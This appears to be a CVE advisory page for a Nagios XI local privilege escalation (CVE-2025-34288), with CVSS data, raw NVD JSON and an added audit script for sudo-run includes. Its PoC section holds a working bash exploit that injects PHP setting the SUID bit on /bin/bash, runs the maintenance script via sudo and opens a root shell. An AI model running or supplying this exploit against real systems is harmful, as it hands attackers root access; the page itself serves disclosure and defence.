Security Vulnerability Report
CVE-2025-34288 CVSS 6.7 MEDIUM

Published: 2025-12-16 23:15:45
Last Modified: 2025-12-24 17:57:42

Description

Nagios XI versions prior to 2026R1.1 are vulnerable to local privilege escalation due to an unsafe interaction between sudo permissions and application file permissions. A user‑accessible maintenance script may be executed as root via sudo and includes an application file that is writable by a lower‑privileged user. A local attacker with access to the application account can modify this file to introduce malicious code, which is then executed with elevated privileges when the script is run. Successful exploitation results in arbitrary code execution as the root user.
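A defensive check for the condition described above, added here as an example and not taken from Nagios or the advisory: given a script that sudoers lets an application account run as root, it flags the script, each file it includes, and each containing directory when a non-root account can write to it. The function names and `TRUSTED_UID` are hypothetical; the code assumes GNU `stat` and follows only include/require paths written as string literals.

```shell
#!/bin/sh
# Added example: audit what a sudo-allowed PHP script pulls in before root runs it.
# Assumes GNU stat and grep -o; only literal-string include/require paths are followed.
TRUSTED_UID="${TRUSTED_UID:-0}"   # the only uid allowed to own code that root executes

# Print why path $1 is unsafe; print nothing when it is safe.
unsafe_reason() (
    [ -e "$1" ] || { echo "does not exist"; exit 0; }
    uid=$(stat -L -c '%u' "$1"); mode=$(stat -L -c '%a' "$1")
    [ "$uid" = "$TRUSTED_UID" ] || { echo "owned by uid $uid"; exit 0; }
    [ $(( 0$mode & 022 )) -eq 0 ] || echo "mode $mode is group/world-writable"
)

# Print the literal include/require targets of PHP file $1, resolved against its directory.
list_includes() (
    dir=$(dirname "$1")
    grep -oE "(include|require)(_once)?[[:space:](]*['\"][^'\"]+['\"]" "$1" |
    sed -E "s/^[^'\"]*['\"]//; s/['\"]\$//" |
    while IFS= read -r inc; do
        case "$inc" in
            /*) echo "$inc" ;;
            *)  echo "$dir/$inc" ;;
        esac
    done
)

# Audit script $1, every include, and every containing directory.
# Prints one "UNSAFE <path>: <reason>" line per finding and returns 1 if there are any.
audit_sudo_script() (
    findings=$(
        { echo "$1"; list_includes "$1"; } | while IFS= read -r f; do
            for p in "$f" "$(dirname "$f")"; do
                r=$(unsafe_reason "$p")
                [ -z "$r" ] || echo "UNSAFE $p: $r"
            done
        done | sort -u
    )
    [ -z "$findings" ] && exit 0
    echo "$findings"
    exit 1
)

# Stand-alone use: pass the path of the script named in the sudoers rule.
[ "$#" -eq 0 ] || audit_sudo_script "$1"
```

Run it against each command a sudoers rule grants to the application account; any finding means that account can change what root executes.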

CVSS Details

CVSS Score: 6.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2026:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2026:r1.0.1:*:*:*:*:*:* - VULNERABLE
Nagios XI < 2026R1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-34288 PoC - Nagios XI Local Privilege Escalation
# This PoC demonstrates the privilege escalation via writable PHP include file

TARGET_FILE="/usr/local/nagiosxi/scripts/components/get_components.php"
MAINT_SCRIPT="/usr/local/nagiosxi/scripts/nagiosxi/maint"
BACKUP_FILE="/tmp/get_components.php.bak"

# Step 1: Backup original file
echo "[*] Backing up original file..."
cp $TARGET_FILE $BACKUP_FILE

# Step 2: Inject malicious PHP code
echo "[*] Injecting malicious payload..."
cat > $TARGET_FILE << 'EOF'
<?php
// Malicious code injected for CVE-2025-34288
$cmd = 'chmod u+s /bin/bash';
$output = shell_exec($cmd);
file_put_contents('/tmp/privesc_executed', 'CVE-2025-34288 exploited at ' . date('Y-m-d H:i:s'));
?>
EOF

# Step 3: Execute the maintenance script with sudo
echo "[*] Executing privileged maintenance script..."
sudo $MAINT_SCRIPT

# Step 4: Verify exploitation
echo "[*] Verifying privilege escalation..."
if [ -f /tmp/privesc_executed ]; then
    echo "[+] Exploitation successful! Root shell available via: bash -p"
    /bin/bash -p
else
    echo "[-] Exploitation may have failed. Restore backup..."
    cp $BACKUP_FILE $TARGET_FILE
fi

# Restore original file
cp $BACKUP_FILE $TARGET_FILE
rm $BACKUP_FILE

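References

https://www.nagios.com/changelog/nagios-xi/2026r1-1/ (Release Notes)
https://www.vulncheck.com/advisories/nagios-xi-privilege-escalation-via-writable-php-include-executed-with-sudo (Third Party Advisory)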

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34288", "sourceIdentifier": "[email protected]", "published": "2025-12-16T23:15:44.720", "lastModified": "2025-12-24T17:57:41.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 2026R1.1 are vulnerable to local privilege escalation due to an unsafe interaction between sudo permissions and application file permissions. A user‑accessible maintenance script may be executed as root via sudo and includes an application file that is writable by a lower‑privileged user. A local attacker with access to the application account can modify this file to introduce malicious code, which is then executed with elevated privileges when the script is run. Successful exploitation results in arbitrary code execution as the root user."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndIncluding": "2024", "matchCriteriaId": "1F24B62F-2AE4-4907-B786-6C37F5E967C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2026:r1:*:*:*:*:*:*", "matchCriteriaId": "DBAC321F-6345-4077-A82D-8CC02C21C358"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2026:r1.0.1:*:*:*:*:*:*", "matchCriteriaId": "2C36F783-6CD4-4417-B696-DC59388478AF"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/2026r1-1/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-privilege-escalation-via-writable-php-include-executed-with-sudo", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}